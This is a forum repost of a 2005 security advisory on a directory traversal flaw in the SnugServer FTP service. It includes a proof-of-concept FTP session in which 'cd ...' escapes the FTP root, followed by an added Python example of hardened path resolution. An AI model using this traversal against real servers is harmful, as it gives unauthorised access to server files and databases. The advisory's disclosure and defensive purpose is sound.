EvilOctal Security Team Technical Discussion Group's Archiver

EvilOctal 2005-1-28 18:39

[Repost] Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40

Article source: seclists.org

[-] Product Information

SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique
firewall file system where your FTP files can be stored in a
data file to prevent internal network hacker attacks. Product
Homepage: [url]http://www.snugserver.com/[/url]

[-] Vulnerability Description

A directory traversal vulnerability has been discovered in the
SnugServer 3.0.0.40 FTP service. An FTP user can change directory
with a dot-only path component ('cd ...' in the PoC below) that the
server does not recognise as a traversal sequence, and thereby gains
access to the server filesystem outside of ftproot. The listing
obtained after the traversal in the PoC shows what appears to be the
SnugServer installation directory itself, including its database
files (SNUG.FDB, Snug.gbk), logs, certificate and script directories.

[-] PoC

root@Whoppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220-
Welcome FTP User. SnugServer is ready.
Name (192.168.1.154:root): muts@default.com
331 Password required for muts@default.com.
Password:
230 See FTP Server
Remote system type is You.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 02:08 dir
226 Transfer Complete.
ftp> cd ...
200 PORT Command Successful.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Cert
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Logs
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Requests
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Scripts
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Errors
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Queue
drw-rw-rw- 1 owner group 0 Jan 21 03:51 www
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Infected
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Temp
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Filtered
drw-rw-rw- 1 owner group 0 Jan 21 03:51 BaseData
-rw-rw-rw- 1 owner group 8421376 Jan 21 03:52 SNUG.FDB
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ftp
-rw-rw-rw- 1 owner group 1861120 Jan 21 03:52 Snug.gbk
-rw-rw-rw- 1 owner group 32 Jan 21 03:52 yarrow.rnd
226 Transfer Complete.
ftp>
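
The PoC escapes ftproot with a single 'cd ...', which suggests the server's
filter (if any) looks only for the literal '..' and hands anything else to the
operating system. The following is an added example, written for this repost
and not taken from SnugServer or from the advisory, of how an FTP server should
resolve client paths so that this class of bypass cannot happen: the path is
normalised against a virtual root before it ever reaches the filesystem,
'..' can never rise above '/', any longer dot-only component such as '...' is
rejected outright, and the resolved on-disk path is checked for containment
again after symlink resolution. The FTP root location (FTPROOT) and the
function names are assumptions made for the example.

```python
"""Hardened FTP path resolution (added example, not SnugServer code)."""
import os
import posixpath

# Assumed on-disk location of the FTP root; the advisory does not state it.
FTPROOT = "/srv/snug/ftp"


class TraversalError(ValueError):
    """Raised when a client-supplied path would leave the FTP root."""


def resolve_ftp_path(cwd, client_path):
    """Return the virtual absolute path for client_path, where '/' is ftproot.

    cwd is the session's current virtual directory.  Dot-only components are
    handled here, before anything reaches the OS: '..' steps up but never
    above '/', and longer runs such as '...' (the sequence the PoC uses to
    escape ftproot) are rejected outright, because how the platform
    interprets them is exactly what a filter that only looks for '..' misses.
    """
    if "\x00" in client_path:
        raise TraversalError("NUL byte in path")
    # Windows clients and servers accept backslashes as separators.
    path = client_path.replace("\\", "/")
    virtual = path if path.startswith("/") else posixpath.join(cwd, path)

    parts = []
    for comp in virtual.split("/"):
        if comp in ("", "."):
            continue                      # empty (double slash) or 'here'
        if comp == "..":
            if not parts:
                raise TraversalError("'..' above FTP root in %r" % client_path)
            parts.pop()
        elif set(comp) == {"."}:
            raise TraversalError("dot-only component %r in %r" % (comp, client_path))
        else:
            parts.append(comp)
    return "/" + "/".join(parts)


def to_disk_path(ftproot, virtual):
    """Map a virtual path onto disk and re-check containment after symlink
    resolution, so the string-level check is not the only barrier."""
    root = os.path.realpath(ftproot)
    real = os.path.realpath(os.path.join(root, *virtual.strip("/").split("/")))
    if os.path.commonpath([root, real]) != root:
        raise TraversalError("%r resolves outside %r" % (virtual, root))
    return real


def replay_cwd(args, cwd="/"):
    """Feed a sequence of CWD arguments through the resolver, as the PoC
    session would, returning (argument, new cwd or 'REJECTED') pairs."""
    results = []
    for arg in args:
        try:
            cwd = resolve_ftp_path(cwd, arg)
            results.append((arg, cwd))
        except TraversalError:
            results.append((arg, "REJECTED"))
    return results


if __name__ == "__main__":
    # Constructed sample: the PoC's 'cd ...' followed by some legitimate
    # and some other hostile CWD arguments.
    for arg, outcome in replay_cwd(["...", "dir", "..\\..", "dir/../dir"]):
        print("CWD %-12r -> %s" % (arg, outcome))
```

Rejecting dot-only components longer than '..' rather than trying to
interpret them is deliberate: their meaning varies between Windows path
APIs, and a server has no legitimate reason to accept them. The realpath
containment check in to_disk_path is the second line of defence for the case
where a directory under ftproot is a symlink or junction pointing elsewhere.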

[-] Patch

The vendor has been notified, and an update is available at:

[url]http://www.snugserver.com/download.php[/url]

[-] Credits

This vulnerability was discovered by muts

© 1999-2008 EvilOctal Security Team